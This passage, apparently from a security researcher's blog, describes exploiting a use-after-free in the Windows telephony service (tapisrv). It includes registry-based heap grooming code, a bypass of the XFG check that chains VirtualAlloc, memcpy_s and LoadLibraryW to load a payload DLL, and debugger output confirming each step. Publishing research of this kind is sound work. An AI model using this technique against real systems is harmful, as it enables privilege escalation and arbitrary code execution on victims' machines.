    RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall");
    RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey);
    BYTE lpbuffer[0x5e] = { 0 };
    *(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018;
    *(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer
    RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);

It seems that there is only one step left to complete the exploitation. I can control the address of the virtual function, which means I can control the RIP register. I can use ROP if there isn't XFG mitigation. However, XFG will limit the RIP register from jumping to a ROP gadget address, causing an INT29 exception when the control flow check fails.

Last step, the truely challenge

Just like the exploitation I introduced in my previous blog post—the exploitation of CNG key isolation—when I can control the RIP, it's useful to invoke LoadLibrary to load the payload DLL. However, I quickly encountered some challenges this time when attempting to set the virtual address to the LoadLibrary address.

Let's review the virtual function call in "TUISPIDLLCallback" dispatch function:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF

The first parameter is a DWORD type value which is obtained from a RPC input buffer which could be controlled by client.
The second parameter is also obtained from a RPC input buffer, but it must be a const value, it's equal to the case number I mentioned in previous section, it must be 3.
The third parameter is a pointer. The buffer is the controlled buffer address with an added offset of 0x3C. Additionally, this pointer will have an offset added to it, which is obtained from the controlled RPC input buffer.
The fourth parameter is a DWORD type that obtained from a controlled RPC input buffer.

It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.

So I can't use LoadLibrary directly to load payload DLL, I need to find out another way to complete the exploitation. At this time, I want to find a indirectly function to load payload DLL, because the third parameter is a pointer and the content of it I could control, I need a function has the following code:

func(a1, a2, a3, ...){
[...]
    path = a3;
    LoadLibarary(path);
[...]
}

The limitation in this scenario is that I can't control which DLL is loaded in the RPC server. Therefore, I can only use existing DLLs in the RPC server, which takes some time for me to find an eligible function. But it's failed to find an eligible function.

It seems like we're back to the beginning. I'm reviewing some APIs in MSDN again, hoping to find another scenario.

The trick

After some time, I remember an interesting API -- VirtualAlloc.

LPVOID VirtualAlloc(
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

The first parameter of VirtualAlloc is lpAddress, which can be set to a specified value, and the process will allocate memory at this address.

I notice that I can allocate a 32-bits address with this function!

The second parameter is a constant value representing the buffer size to allocate. However, it's not necessary for my purpose. The last parameter is a controlled DWORD value, which I can set to the value for flProtect. I could set it to PAGE_EXECUTE_READWRITE (0x40).

But a new challenge arises with the third parameter.

The third parameter is flAllocationType, and in my scenario, it's a pointer. This implies that the low 32 bits of the pointer should be the flAllocationType. I need to set it to MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000). Although I can control the offset, I don't know the address of the pointer, so I can't set the low 32 bits of the pointer to a specified value. I tried allocating the heap with some random value, but all of it failed.

Let's review the "use" code again:

result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF
if(!result){
[...]
}
*controlledbuffer = result;
return result;

The virtual function return value will be stored into the controlled buffer, which will then be returned to the client. This means that if I allocate memory using a function such as MIDL_user_allocate, it will return a 64-bit address, but only the low 32 bits of the address will be returned to the client. This will be a useful information disclosure.

But I still can't predict the low 32-bits value of the third parameter when invoking VirtualAlloc. So, I tried increasing the allocate buffer size to find out if there is any regularity. Actually, the maximum size of the RPC client could be set is larger than 0x40000000. When I set the allocate size to 0x40000000, I found an interesting situation.

I find out that when the allocate size is set to 0x40000000, the low 32-bits address of the pointer increases linearly, which makes it predictable.

That means, for example, if the leaked low 32-bits return 0xbd700000, I know that if I set the input buffer size to 0x40000000, the next controlled buffer's low 32-bits will be 0xfd800000. Additionally, the offset of the third parameter couldn't be larger than the input buffer size. Therefore, I need to ensure that the low 32-bits address is larger than 0xc0000000. In this way, the low 32-bits of the third parameter could be a DWORD value larger than 0x100000000 after the address is added with the offset. It's possible to set the third parameter to 0x3000 (MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000)).

As for now, I make heap fengshui and control the all content of the heap hole with the controllable registry key value, and for bypassing XFG mitigation, I need to first leak the low 32-bits address by setting the MIDL_user_allocate function address in key value, and then set the VirtualAlloc function address in key value, obviously, it doesn't end if I allocate 32-bits address succeed, I need to invoke "TUISPIDLLCallback" multiple times to complete bypassing XFG mitigation. The good news is that I could control the timing of "use", so all I need to do is free the registry key value heap, set the new key value with the target function address, allocate a new key value heap, and use it again.

tapisrv!TUISPIDLLCallback+0x1cc:
00007fff`7c27fecc ff154ee80000    call    qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)}
0:007> u rax
KERNEL32!VirtualAllocStub:
00007fff`aeae3bf0 48ff2551110700  jmp     qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)]
00007fff`aeae3bf7 cc              int     3
00007fff`aeae3bf8 cc              int     3
00007fff`aeae3bf9 cc              int     3
00007fff`aeae3bfa cc              int     3
00007fff`aeae3bfb cc              int     3
00007fff`aeae3bfc cc              int     3
00007fff`aeae3bfd cc              int     3
0:007> r r8d
r8d=3000
0:007> r r9d
r9d=40
0:007> r rcx
rcx=00000000ba000000
0:007> r rdx
rdx=0000000000000003

According to the debugging information, we can see that every parameter satisfies the request. After invoking the VirtualAlloc function, we have successfully allocated a 32-bit address.

0:007> p
tapisrv!TUISPIDLLCallback+0x1d2:
00007fff`7c27fed2 85c0            test    eax,eax
0:007> dq ba000000
00000000`ba000000  00000000`00000000 00000000`00000000
00000000`ba000010  00000000`00000000 00000000`00000000
00000000`ba000020  00000000`00000000 00000000`00000000
00000000`ba000030  00000000`00000000 00000000`00000000
00000000`ba000040  00000000`00000000 00000000`00000000

This means I have successfully controlled the first parameter as a pointer. The next step is to copy the payload DLL path into the 32-bit address. However, I can't use the memcpy function because the second parameter is a constant value, which must be 3. Instead, I decide to use the memcpy_s function, where the second parameter represents the copy length and the third parameter is the source address. I can only copy 3 bytes at a time, but I can invoke it multiple times to complete the path copying.

0:009> dc ba000000
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.

There is one step last is invoking LoadLibrary to load payload DLL.

0:009> u
KERNELBASE!LoadLibraryW:
00007fff`ad1f2480 4533c0          xor     r8d,r8d
00007fff`ad1f2483 33d2            xor     edx,edx
00007fff`ad1f2485 e9e642faff      jmp     KERNELBASE!LoadLibraryExW (00007fff`ad196770)
00007fff`ad1f248a cc              int     3
00007fff`ad1f248b cc              int     3
00007fff`ad1f248c cc              int     3
00007fff`ad1f248d cc              int     3
00007fff`ad1f248e cc              int     3
0:009> dc rcx
00000000`ba000000  003a0043 0055005c 00650073 00730072  C.:.\.U.s.e.r.s.
00000000`ba000010  0070005c 006e0077 0041005c 00700070  \.p.w.n.\.A.p.p.
00000000`ba000020  00610044 00610074 0052005c 0061006f  D.a.t.a.\.R.o.a.
00000000`ba000030  0069006d 0067006e 0066005c 006b0061  m.i.n.g.\.f.a.k.
00000000`ba000040  00640065 006c006c 0064002e 006c006c  e.d.l.l...d.l.l.
00000000`ba000050  00000000 00000000 00000000 00000000  ................
00000000`ba000060  00000000 00000000 00000000 00000000  ................
00000000`ba000070  00000000 00000000 00000000 00000000  ................
0:009> k
 # Child-SP          RetAddr               Call Site
00 000000ab`ac97eac8 00007fff`7c27fed2     KERNELBASE!LoadLibraryW
01 000000ab`ac97ead0 00007fff`7c27817a     tapisrv!TUISPIDLLCallback+0x1d2
02 000000ab`ac97eb60 00007fff`afb57f13     tapisrv!ClientRequest+0xba